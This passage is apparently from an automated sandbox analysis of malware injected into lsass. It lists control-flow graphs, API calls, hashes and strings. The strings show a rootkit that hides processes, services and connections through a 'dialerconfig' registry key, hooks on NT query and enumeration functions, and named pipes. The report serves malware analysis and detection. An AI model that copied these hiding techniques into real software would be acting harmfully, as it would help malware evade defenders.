                                            • Instruction Fuzzy Hash: C051D132B107A5C6FB60CF66988C6AD63E4F744794F069413EFA527B86DB38C869C710

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 106492572-2879589442
                                            • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction ID: 4aaa1fbf0e72b96de9cac81fd4f7ab81f2ee325bf3078e55ecff6abc8cc10923
                                            • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction Fuzzy Hash: F671F577710B90C5FB109F66E89C69D27A4FB98B88F421123DB8E47A2ADE39C459C740

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction ID: 2e3fad50795f7a0079a38e66a231913a676bdedf83bff55786a910ba4333ad1d
                                            • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction Fuzzy Hash: 0DF03C73304781D2FB608B25E4DC39D6760F754B88F858023CB894A956DE7DC68CCB00

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                            • String ID:
                                            • API String ID: 1683269324-0
                                            • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction ID: 235a7f768eb8c3ab9d0458457c1d5a34f9fd9f592f8dc39969e1513678aacc8f
                                            • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction Fuzzy Hash: 3F118073618781C2F721D721B8CE76D2291BB54706F471027ABA6893D7EF3EC0AC8254

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00000202C0AE1650: GetProcessHeap.KERNEL32 ref: 00000202C0AE165B
                                              • Part of subcall function 00000202C0AE1650: HeapAlloc.KERNEL32 ref: 00000202C0AE166A
                                              • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16DA
                                              • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1707
                                              • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE1721
                                              • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1741
                                              • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE175C
                                              • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE177C
                                              • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE1797
                                              • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17B7
                                              • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE17D2
                                              • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17F2
                                            • Sleep.KERNEL32 ref: 00000202C0AE1C43
                                            • SleepEx.KERNELBASE ref: 00000202C0AE1C49
                                              • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE180D
                                              • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE182D
                                              • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE1848
                                              • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1868
                                              • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE1883
                                              • Part of subcall function 00000202C0AE1650: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE18A3
                                              • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE18BE
                                              • Part of subcall function 00000202C0AE1650: RegCloseKey.ADVAPI32 ref: 00000202C0AE18C8
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                            • String ID:
                                            • API String ID: 1534210851-0
                                            • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction ID: da309ec870f8e9d4d5b5b498153ffb026461c589e783c2c4c55ac16aa4ae19b4
                                            • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction Fuzzy Hash: 8F310E36300BA5D1FB509F36DEDD36E12A6AB44FC0F064023DFA987697EE24C8798250

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 231 202c0ab2908-202c0ab2973 call 202c0ab0f34 * 4 240 202c0ab2b8b 231->240 241 202c0ab2979-202c0ab297c 231->241 242 202c0ab2b8d-202c0ab2ba9 240->242 241->240 243 202c0ab2982-202c0ab2985 241->243 243->240 244 202c0ab298b-202c0ab298e 243->244 244->240 245 202c0ab2994-202c0ab29b2 244->245 245->240 247 202c0ab29b8-202c0ab29dc call 202c0ab0d6c 245->247 250 202c0ab2a0b-202c0ab2a12 247->250 251 202c0ab29de-202c0ab2a09 call 202c0ab0d6c 247->251 253 202c0ab2ab2-202c0ab2ab9 250->253 254 202c0ab2a18-202c0ab2a25 250->254 251->250 255 202c0ab2b6c-202c0ab2b89 253->255 256 202c0ab2abf-202c0ab2ad6 253->256 254->253 258 202c0ab2a2b-202c0ab2a39 LoadLibraryA 254->258 255->242 256->255 259 202c0ab2adc 256->259 260 202c0ab2a9d-202c0ab2aa5 258->260 261 202c0ab2a3b-202c0ab2a45 258->261 264 202c0ab2ae2-202c0ab2af7 259->264 260->258 262 202c0ab2aa7-202c0ab2aac 260->262 265 202c0ab2a48-202c0ab2a4c 261->265 262->253 266 202c0ab2b5b-202c0ab2b66 264->266 267 202c0ab2af9-202c0ab2b0a 264->267 268 202c0ab2a9a 265->268 269 202c0ab2a4e-202c0ab2a52 265->269 266->255 266->264 271 202c0ab2b0c-202c0ab2b13 267->271 272 202c0ab2b15-202c0ab2b19 267->272 268->260 273 202c0ab2a7d-202c0ab2a87 269->273 274 202c0ab2a54-202c0ab2a7b 269->274 276 202c0ab2b48-202c0ab2b59 271->276 277 202c0ab2b1b-202c0ab2b22 272->277 278 202c0ab2b24-202c0ab2b28 272->278 275 202c0ab2a8d-202c0ab2a98 273->275 274->275 275->265 276->266 276->267 277->276 279 202c0ab2b3a-202c0ab2b3e 278->279 280 202c0ab2b2a-202c0ab2b38 278->280 279->276 281 202c0ab2b40-202c0ab2b43 279->281 280->276 281->276
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3012950284.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ab0000_lsass.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction ID: fe811162bf7b14930204ab85ca965a1531c7317894ac0595a7362860ab0b9f73
                                            • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction Fuzzy Hash: 5E61FC32701351C7FA68CF2A948CB6DB3A1FB04BA4F568027DB1907786DB38E856C704

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 332 202c0ae2cdc-202c0ae2d55 call 202c0afecc0 335 202c0ae3090-202c0ae30b3 332->335 336 202c0ae2d5b-202c0ae2d61 332->336 336->335 337 202c0ae2d67-202c0ae2d6a 336->337 337->335 338 202c0ae2d70-202c0ae2d73 337->338 338->335 339 202c0ae2d79-202c0ae2d89 GetModuleHandleA 338->339 340 202c0ae2d9d 339->340 341 202c0ae2d8b-202c0ae2d9b call 202c0af3090 339->341 343 202c0ae2da0-202c0ae2dbe 340->343 341->343 343->335 346 202c0ae2dc4-202c0ae2de3 StrCmpNIW 343->346 346->335 347 202c0ae2de9-202c0ae2ded 346->347 347->335 348 202c0ae2df3-202c0ae2dfd 347->348 348->335 349 202c0ae2e03-202c0ae2e0a 348->349 349->335 350 202c0ae2e10-202c0ae2e23 349->350 351 202c0ae2e25-202c0ae2e31 350->351 352 202c0ae2e33 350->352 353 202c0ae2e36-202c0ae2e3a 351->353 352->353 354 202c0ae2e3c-202c0ae2e48 353->354 355 202c0ae2e4a 353->355 356 202c0ae2e4d-202c0ae2e57 354->356 355->356 357 202c0ae2f4d-202c0ae2f51 356->357 358 202c0ae2e5d-202c0ae2e60 356->358 361 202c0ae2f57-202c0ae2f5a 357->361 362 202c0ae3082-202c0ae308a 357->362 359 202c0ae2e72-202c0ae2e7c 358->359 360 202c0ae2e62-202c0ae2e6f call 202c0ae1a14 358->360 366 202c0ae2eb0-202c0ae2eba 359->366 367 202c0ae2e7e-202c0ae2e8b 359->367 360->359 363 202c0ae2f5c-202c0ae2f68 call 202c0ae1a14 361->363 364 202c0ae2f6b-202c0ae2f75 361->364 362->335 362->350 363->364 369 202c0ae2f77-202c0ae2f84 364->369 370 202c0ae2fa5-202c0ae2fa8 364->370 373 202c0ae2ebc-202c0ae2ec9 366->373 374 202c0ae2eea-202c0ae2eed 366->374 367->366 372 202c0ae2e8d-202c0ae2e9a 367->372 369->370 378 202c0ae2f86-202c0ae2f93 369->378 379 202c0ae2faa-202c0ae2fb3 call 202c0ae1d28 370->379 380 202c0ae2fb5-202c0ae2fc2 lstrlenW 370->380 381 202c0ae2e9d-202c0ae2ea3 372->381 373->374 382 202c0ae2ecb-202c0ae2ed8 373->382 376 202c0ae2eef-202c0ae2ef9 call 202c0ae1d28 374->376 377 202c0ae2efb-202c0ae2f08 lstrlenW 374->377 376->377 389 202c0ae2f43-202c0ae2f48 376->389 384 202c0ae2f0a-202c0ae2f14 377->384 385 202c0ae2f2b-202c0ae2f3d call 202c0ae3930 377->385 386 202c0ae2f96-202c0ae2f9c 378->386 379->380 398 202c0ae2ffa-202c0ae3005 379->398 390 202c0ae2fc4-202c0ae2fce 380->390 391 202c0ae2fe5-202c0ae2fef call 202c0ae3930 380->391 388 202c0ae2ea9-202c0ae2eae 381->388 381->389 392 202c0ae2edb-202c0ae2ee1 382->392 384->385 396 202c0ae2f16-202c0ae2f29 call 202c0ae1554 384->396 385->389 401 202c0ae2ff2-202c0ae2ff4 385->401 397 202c0ae2f9e-202c0ae2fa3 386->397 386->398 388->366 388->381 389->401 390->391 402 202c0ae2fd0-202c0ae2fe3 call 202c0ae1554 390->402 391->401 392->389 393 202c0ae2ee3-202c0ae2ee8 392->393 393->374 393->392 396->385 396->389 397->370 397->386 404 202c0ae307c-202c0ae3080 398->404 405 202c0ae3007-202c0ae300b 398->405 401->362 401->398 402->391 402->398 404->362 410 202c0ae300d-202c0ae3011 405->410 411 202c0ae3013-202c0ae302d call 202c0ae86a0 405->411 410->411 413 202c0ae3030-202c0ae3033 410->413 411->413 416 202c0ae3056-202c0ae3059 413->416 417 202c0ae3035-202c0ae3053 call 202c0ae86a0 413->417 416->404 418 202c0ae305b-202c0ae3079 call 202c0ae86a0 416->418 417->416 418->404
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction ID: 3357ed6314eabba8fa08e2096083bcb3f05f8c0f1971a8852dd6ac07c7fe1732
                                            • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction Fuzzy Hash: 5CB17B62210B90C2FB689F25D48C7AD63A4FB84B84F565017EFAA53796DF35CDA8C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction ID: 1c79aad55ccd82dee0190766b37111c65c1eb97836056699a6b1e1d23cddf3b8
                                            • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction Fuzzy Hash: 05310473205B80DAEB609F60E8887EE6364F794744F45442BDB9E47A9AEF38C658C710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction ID: 6b269ed75a72be8ab7d7467a3451bbe869e7fbdbfaf4ff46492a360364212acb
                                            • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction Fuzzy Hash: 1D314C33214B80C6EB60DF25E88879E73A4F788754F510127EBAD47B96EF38C5598B00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                            • String ID:
                                            • API String ID: 1443284424-0
                                            • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction ID: a9daa23172fa6c5d4a107eaeca965a46feea8aae7f9fb40a412d1826de46df25
                                            • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction Fuzzy Hash: 3FE1CB33A04B80DAF710CB66D4886DD7BB1F345788F158217EF9A57B9ADA39C51AC700

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction ID: f78ac25c8aa7bdd24b278013f40ef6e62fb5d5911618730387ce5f21f02b6c5f
                                            • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction Fuzzy Hash: FB514973218B94D2FB14DB62E58C39EB3A1F788B84F458226DB9947B55DF39C069C700

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentThread$AddressHandleModuleProc
                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                            • API String ID: 4175298099-1975688563
                                            • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction ID: 08831ba54b4148c0853c6b321da8959b0ede21d7b4f39930bbab190b657904fb
                                            • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction Fuzzy Hash: DF3197A2100B8AE0FB04EF69E8DD7DC2321B754384FC35523A769031779E7A866EC390

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                            • API String ID: 2171963597-1373409510
                                            • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction ID: a2b6e8064d34f6058f400fa62b6a60ed05e28081ee27e155f540df09f2b9bfab
                                            • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction Fuzzy Hash: 58211837618B40D2FB109B25E58C75E67A0F789BA4F514217EB9902BAADF3DC54DCB00

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction ID: beb3484aa7eb7072961678706af01f231505dba17c28f7f05dceca5e8fb339fc
                                            • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction Fuzzy Hash: 38418273214B90D7E7608F52E48879EB7A1F388B84F01822BDB9907B55DF38D169CB00

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 449 202c0ab69f0-202c0ab69f6 450 202c0ab6a31-202c0ab6a3b 449->450 451 202c0ab69f8-202c0ab69fb 449->451 452 202c0ab6b58-202c0ab6b6d 450->452 453 202c0ab69fd-202c0ab6a00 451->453 454 202c0ab6a25-202c0ab6a64 call 202c0ab70a0 451->454 457 202c0ab6b7c-202c0ab6b96 call 202c0ab6f34 452->457 458 202c0ab6b6f 452->458 455 202c0ab6a02-202c0ab6a05 453->455 456 202c0ab6a18 __scrt_dllmain_crt_thread_attach 453->456 472 202c0ab6a6a-202c0ab6a7f call 202c0ab6f34 454->472 473 202c0ab6b32 454->473 460 202c0ab6a11-202c0ab6a16 call 202c0ab6fe4 455->460 461 202c0ab6a07-202c0ab6a10 455->461 464 202c0ab6a1d-202c0ab6a24 456->464 470 202c0ab6bcf-202c0ab6c00 call 202c0ab7270 457->470 471 202c0ab6b98-202c0ab6bcd call 202c0ab705c call 202c0ab6efc call 202c0ab73f8 call 202c0ab7210 call 202c0ab7234 call 202c0ab708c 457->471 462 202c0ab6b71-202c0ab6b7b 458->462 460->464 481 202c0ab6c11-202c0ab6c17 470->481 482 202c0ab6c02-202c0ab6c08 470->482 471->462 484 202c0ab6b4a-202c0ab6b57 call 202c0ab7270 472->484 485 202c0ab6a85-202c0ab6a96 call 202c0ab6fa4 472->485 476 202c0ab6b34-202c0ab6b49 473->476 488 202c0ab6c5e-202c0ab6c74 call 202c0ab2858 481->488 489 202c0ab6c19-202c0ab6c23 481->489 482->481 487 202c0ab6c0a-202c0ab6c0c 482->487 484->452 499 202c0ab6a98-202c0ab6abc call 202c0ab73bc call 202c0ab6eec call 202c0ab6f18 call 202c0ab90dc 485->499 500 202c0ab6ae7-202c0ab6af1 call 202c0ab7210 485->500 494 202c0ab6cff-202c0ab6d0c 487->494 507 202c0ab6cac-202c0ab6cae 488->507 508 202c0ab6c76-202c0ab6c78 488->508 495 202c0ab6c2f-202c0ab6c3d call 202c0ac2758 489->495 496 202c0ab6c25-202c0ab6c2d 489->496 502 202c0ab6c43-202c0ab6c58 call 202c0ab69f0 495->502 518 202c0ab6cf5-202c0ab6cfd 495->518 496->502 499->500 552 202c0ab6abe-202c0ab6ac5 __scrt_dllmain_after_initialize_c 499->552 500->473 520 202c0ab6af3-202c0ab6aff call 202c0ab7260 500->520 502->488 502->518 516 202c0ab6cb0-202c0ab6cb3 507->516 517 202c0ab6cb5-202c0ab6cca call 202c0ab69f0 507->517 508->507 515 202c0ab6c7a-202c0ab6c9c call 202c0ab2858 call 202c0ab6b58 508->515 515->507 546 202c0ab6c9e-202c0ab6ca6 call 202c0ac2758 515->546 516->517 516->518 517->518 531 202c0ab6ccc-202c0ab6cd6 517->531 518->494 539 202c0ab6b01-202c0ab6b0b call 202c0ab7178 520->539 540 202c0ab6b25-202c0ab6b30 520->540 536 202c0ab6ce1-202c0ab6cf1 call 202c0ac2758 531->536 537 202c0ab6cd8-202c0ab6cdf 531->537 536->518 537->518 539->540 551 202c0ab6b0d-202c0ab6b1b 539->551 540->476 546->507 551->540 552->500 553 202c0ab6ac7-202c0ab6ae4 call 202c0ab9078 552->553 553->500
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3012950284.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ab0000_lsass.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: c51e0415e1b0b4e1f38e484a64db28ef20f8ba36d571437a8af6fe375b171dd7
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: B081D331600741C6FA54AB29A4CD39D66E8FB46780F47402BEB49977B7DB7DC94E8700

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 556 202c0ae75f0-202c0ae75f6 557 202c0ae7631-202c0ae763b 556->557 558 202c0ae75f8-202c0ae75fb 556->558 559 202c0ae7758-202c0ae776d 557->559 560 202c0ae75fd-202c0ae7600 558->560 561 202c0ae7625-202c0ae7664 call 202c0ae7ca0 558->561 565 202c0ae776f 559->565 566 202c0ae777c-202c0ae7796 call 202c0ae7b34 559->566 563 202c0ae7618 __scrt_dllmain_crt_thread_attach 560->563 564 202c0ae7602-202c0ae7605 560->564 579 202c0ae766a-202c0ae767f call 202c0ae7b34 561->579 580 202c0ae7732 561->580 568 202c0ae761d-202c0ae7624 563->568 570 202c0ae7611-202c0ae7616 call 202c0ae7be4 564->570 571 202c0ae7607-202c0ae7610 564->571 572 202c0ae7771-202c0ae777b 565->572 577 202c0ae77cf-202c0ae7800 call 202c0ae7e70 566->577 578 202c0ae7798-202c0ae77cd call 202c0ae7c5c call 202c0ae7afc call 202c0ae7ff8 call 202c0ae7e10 call 202c0ae7e34 call 202c0ae7c8c 566->578 570->568 588 202c0ae7811-202c0ae7817 577->588 589 202c0ae7802-202c0ae7808 577->589 578->572 591 202c0ae774a-202c0ae7757 call 202c0ae7e70 579->591 592 202c0ae7685-202c0ae7696 call 202c0ae7ba4 579->592 583 202c0ae7734-202c0ae7749 580->583 594 202c0ae785e-202c0ae7874 call 202c0ae3458 588->594 595 202c0ae7819-202c0ae7823 588->595 589->588 593 202c0ae780a-202c0ae780c 589->593 591->559 609 202c0ae7698-202c0ae76bc call 202c0ae7fbc call 202c0ae7aec call 202c0ae7b18 call 202c0ae9cdc 592->609 610 202c0ae76e7-202c0ae76f1 call 202c0ae7e10 592->610 599 202c0ae78ff-202c0ae790c 593->599 612 202c0ae78ac-202c0ae78ae 594->612 613 202c0ae7876-202c0ae7878 594->613 600 202c0ae782f-202c0ae783d call 202c0af3358 595->600 601 202c0ae7825-202c0ae782d 595->601 606 202c0ae7843-202c0ae7858 call 202c0ae75f0 600->606 623 202c0ae78f5-202c0ae78fd 600->623 601->606 606->594 606->623 609->610 659 202c0ae76be-202c0ae76c5 __scrt_dllmain_after_initialize_c 609->659 610->580 632 202c0ae76f3-202c0ae76ff call 202c0ae7e60 610->632 621 202c0ae78b0-202c0ae78b3 612->621 622 202c0ae78b5-202c0ae78ca call 202c0ae75f0 612->622 613->612 620 202c0ae787a-202c0ae789c call 202c0ae3458 call 202c0ae7758 613->620 620->612 653 202c0ae789e-202c0ae78a6 call 202c0af3358 620->653 621->622 621->623 622->623 641 202c0ae78cc-202c0ae78d6 622->641 623->599 643 202c0ae7701-202c0ae770b call 202c0ae7d78 632->643 644 202c0ae7725-202c0ae7730 632->644 647 202c0ae78e1-202c0ae78f1 call 202c0af3358 641->647 648 202c0ae78d8-202c0ae78df 641->648 643->644 658 202c0ae770d-202c0ae771b 643->658 644->583 647->623 648->623 653->612 658->644 659->610 660 202c0ae76c7-202c0ae76e4 call 202c0ae9c78 659->660 660->610
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: 62707e5ddcb1c22e119202a5bac5f5c202d9faddf4cc597c2adbdb7861f3ec9d
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: 0481E4227047C1C6FB54AB29A8CD36D2291BB95780F1A4017DBE947797DF39CAAD8700

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
